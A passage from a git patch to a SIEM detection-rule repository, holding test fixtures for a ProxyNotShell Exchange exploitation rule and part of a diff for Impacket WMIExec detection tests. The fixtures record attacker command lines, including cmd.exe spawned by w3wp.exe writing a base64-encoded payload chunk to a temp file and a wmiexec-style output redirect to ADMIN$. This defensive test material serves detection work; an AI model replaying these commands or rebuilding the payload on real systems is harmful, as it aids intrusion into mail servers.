"subject.account.privileges": "local user rights", "subject.account.session_id": "883686380", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-03-29T12:26:08.920Z", "type": "raw", "uuid": "74608fb7-f7f9-4d0d-a154-cd2bdb868b7a"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4688\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"13312\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-03-29T12:26:08.946651100Z\"},\"EventRecordID\":\"8695706\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"16476\"},\"Channel\":\"Security\",\"Computer\":\"exchange.example.com\",\"Security\":null},\"EventData\":{\"Data\":[{\"text\":\"S-1-5-18\",\"Name\":\"SubjectUserSid\"},{\"text\":\"EXCHANGE$\",\"Name\":\"SubjectUserName\"},{\"text\":\"example\",\"Name\":\"SubjectDomainName\"},{\"text\":\"0x3e7\",\"Name\":\"SubjectLogonId\"},{\"text\":\"0x8e4\",\"Name\":\"NewProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"Name\":\"NewProcessName\"},{\"text\":\"%%1936\",\"Name\":\"TokenElevationType\"},{\"text\":\"0x2890\",\"Name\":\"ProcessId\"},{\"text\":\"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\" /c echo 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>>%TEMP%\\\\RsJnf.b64\",\"Name\":\"CommandLine\"},{\"text\":\"S-1-0-0\",\"Name\":\"TargetUserSid\"},{\"text\":\"-\",\"Name\":\"TargetUserName\"},{\"text\":\"-\",\"Name\":\"TargetDomainName\"},{\"text\":\"0x0\",\"Name\":\"TargetLogonId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\"Name\":\"ParentProcessName\"},{\"text\":\"S-1-16-16384\",\"Name\":\"MandatoryLabel\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": 
"Control", "event_src.category": "Operating system", "event_src.fqdn": "exchange.example.com", "event_src.host": "exchange.example.com", "event_src.hostname": "exchange", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4688_A_new_process_has_been_created", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4688", "normalized": true, "object": "process", "object.account.domain": "example", "object.account.id": "S-1-5-18", "object.account.name": "exchange$", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\Windows\\System32\\cmd.exe\" /c echo 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>>%TEMP%\\RsJnf.b64", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.id": "2276", "object.process.name": "cmd.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\inetsrv\\w3wp.exe", "object.process.parent.id": "10384", "object.process.parent.name": "w3wp.exe", "object.process.parent.path": "c:\\windows\\system32\\inetsrv\\", "object.process.path": "c:\\windows\\system32\\", "recv_ipv4": "127.0.0.1", "recv_time": "2023-04-03T10:05:03.447Z", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-18", "subject.account.name": "exchange$", "subject.account.privileges": "TokenElevationTypeDefault", "subject.account.session_id": "999", "subject.state": "on behalf of oneself", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-03-29T12:26:08.946Z", "type": "raw", "uuid": "e705d12e-8f81-4e5a-a134-6aaeb565d06c"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4688\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"13312\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-03-29T12:26:10.050853400Z\"},\"EventRecordID\":\"8695764\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"23252\"},\"Channel\":\"Security\",\"Computer\":\"exchange.example.com\",\"Security\":null},\"EventData\":{\"Data\":[{\"text\":\"S-1-5-18\",\"Name\":\"SubjectUserSid\"},{\"text\":\"EXCHANGE$\",\"Name\":\"SubjectUserName\"},{\"text\":\"example\",\"Name\":\"SubjectDomainName\"},{\"text\":\"0x3e7\",\"Name\":\"SubjectLogonId\"},{\"text\":\"0x1d64\",\"Name\":\"NewProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"Name\":\"NewProcessName\"},{\"text\":\"%%1936\",\"Name\":\"TokenElevationType\"},{\"text\":\"0x2890\",\"Name\":\"ProcessId\"},{\"text\":\"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\" /c echo 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>>%TEMP%\\\\RsJnf.b64\",\"Name\":\"CommandLine\"},{\"text\":\"S-1-0-0\",\"Name\":\"TargetUserSid\"},{\"text\":\"-\",\"Name\":\"TargetUserName\"},{\"text\":\"-\",\"Name\":\"TargetDomainName\"},{\"text\":\"0x0\",\"Name\":\"TargetLogonId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\"Name\":\"ParentProcessName\"},{\"text\":\"S-1-16-16384\",\"Name\":\"MandatoryLabel\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Operating system", "event_src.fqdn": "exchange.example.com", "event_src.host": "exchange.example.com", "event_src.hostname": "exchange", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", 
"id": "PT_Microsoft_Windows_eventlog_4688_A_new_process_has_been_created", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4688", "normalized": true, "object": "process", "object.account.domain": "example", "object.account.id": "S-1-5-18", "object.account.name": "exchange$", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\Windows\\System32\\cmd.exe\" /c echo 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>>%TEMP%\\RsJnf.b64", "object.process.fullpath": 
"c:\\windows\\system32\\cmd.exe", "object.process.id": "7524", "object.process.name": "cmd.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\inetsrv\\w3wp.exe", "object.process.parent.id": "10384", "object.process.parent.name": "w3wp.exe", "object.process.parent.path": "c:\\windows\\system32\\inetsrv\\", "object.process.path": "c:\\windows\\system32\\", "recv_ipv4": "127.0.0.1", "recv_time": "2023-04-03T10:05:03.447Z", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-18", "subject.account.name": "exchange$", "subject.account.privileges": "TokenElevationTypeDefault", "subject.account.session_id": "999", "subject.state": "on behalf of oneself", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-03-29T12:26:10.050Z", "type": "raw", "uuid": "d705d7f5-fd68-4466-817c-9b49846fc7a5"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "alert.regex_match": "/c echo ...>>%temp%\\rsjnf.b64", "category.generic": "Attack", "category.high": "Initial Access", "category.low": "Exploit Public-Facing Application", "correlation_name": "ProxyNotShell", "correlation_type": "incident", "detect": "CVE-2022-41040|CVE-2022-41082", "dst.fqdn": "exchange.example.com", "dst.host": "exchange.example.com", "dst.hostname": "exchange", "event_src.fqdn": "exchange.example.com", "event_src.host": "exchange.example.com", "event_src.hostname": "exchange", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "ProxyNotShell|exchange.example.com|k_ivanov", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "example", "object.account.id": "S-1-5-18", "object.account.name": "exchange$", 
"object.account.session_id": "999", "object.process.cmdline": "\"C:\\Windows\\System32\\cmd.exe\" /c echo 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>>%TEMP%\\RsJnf.b64", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.id": "2276", "object.process.name": "cmd.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\inetsrv\\w3wp.exe", "object.process.parent.id": "10384", "object.process.parent.name": "w3wp.exe", "object.process.parent.path": "c:\\windows\\system32\\inetsrv\\", "object.process.path": "c:\\windows\\system32\\", "src.host": "nbnaxypfekbxe", "src.hostname": "nbnaxypfekbxe", "src.ip": "10.155.1.6", "src.port": 45248, "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1999687082-732736654-454791560-1114", "subject.account.name": "k_ivanov", "subject.account.privileges": "local user rights", "subject.account.session_id": "883686380"} From 1b9ab9c056b66b8e21734b0c927ea5c25ac71125 Mon Sep 17 00:00:00 2001 
From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Tue, 1 Aug 2023 11:29:44 +0300 Subject: [PATCH 38/57] =?UTF-8?q?=D0=A3=D0=B4=D0=B0=D0=BB=D0=B5=D0=BD?= =?UTF-8?q?=D1=8B=20=D0=BF=D0=BE=D0=B2=D1=82=D0=BE=D1=80=D1=8F=D1=8E=D1=89?= =?UTF-8?q?=D0=B8=D0=B5=D1=81=D1=8F=20=D1=82=D0=B5=D1=81=D1=82=D1=8B,=20?= =?UTF-8?q?=D1=80=D0=B0=D1=81=D1=88=D0=B8=D1=80=D0=B8=D0=BB=20=D0=BF=D0=BE?= =?UTF-8?q?=D0=BB=D1=8F=20=D0=B4=D0=B0=D0=BD=D0=BD=D1=8B=D1=85=20=D0=BA?= =?UTF-8?q?=D0=BE=D1=82=D0=BE=D1=80=D1=8B=D0=B5=20=D0=BC=D1=8B=20=D0=BE?= =?UTF-8?q?=D0=B6=D0=B8=D0=B4=D0=B0=D0=B5=D0=BC=20=D0=B4=D0=BB=D1=8F=20?= =?UTF-8?q?=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Impacket=5FWMIExe?= =?UTF-8?q?c=5FCommand=5FExecuted)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Impacket_WMIExec_Command_Executed/tests/test_1.sc | 2 +- .../Impacket_WMIExec_Command_Executed/tests/test_2.sc | 4 ++-- .../Impacket_WMIExec_Command_Executed/tests/test_3.sc | 3 --- .../Impacket_WMIExec_Command_Executed/tests/test_4.sc | 4 ---- .../Impacket_WMIExec_Command_Executed/tests/test_5.sc | 3 --- .../Impacket_WMIExec_Command_Executed/tests/test_6.sc | 3 --- 6 files changed, 3 insertions(+), 16 deletions(-) delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_3.sc delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_4.sc delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_5.sc delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_6.sc 
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_1.sc
index 1b7e7432..43e58648 100644
--- a/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_1.sc
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_1.sc
@@ -1,3 +1,3 @@ {"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-30T20:32:51.1685890Z\"},\"EventRecordID\":\"9826\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1964\",\"ThreadID\":\"1664\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-30 20:32:51.168\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-b0f3-5cc8-0000-00105f321d00}\"},{\"Name\":\"ProcessId\",\"text\":\"3840\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"6.1.7601.17514 (win7sp1_rtm.101119-1850)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"cmd.exe /Q /c cd \\\\ 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__1556656369.7 
2>&1\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{365abb72-b0f2-5cc8-0000-00203d311d00}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d313d\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{365abb72-b0c0-5cc8-0000-001017c31c00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"836\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "365abb72-b0f2-5cc8-0000-00203d311d00", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", 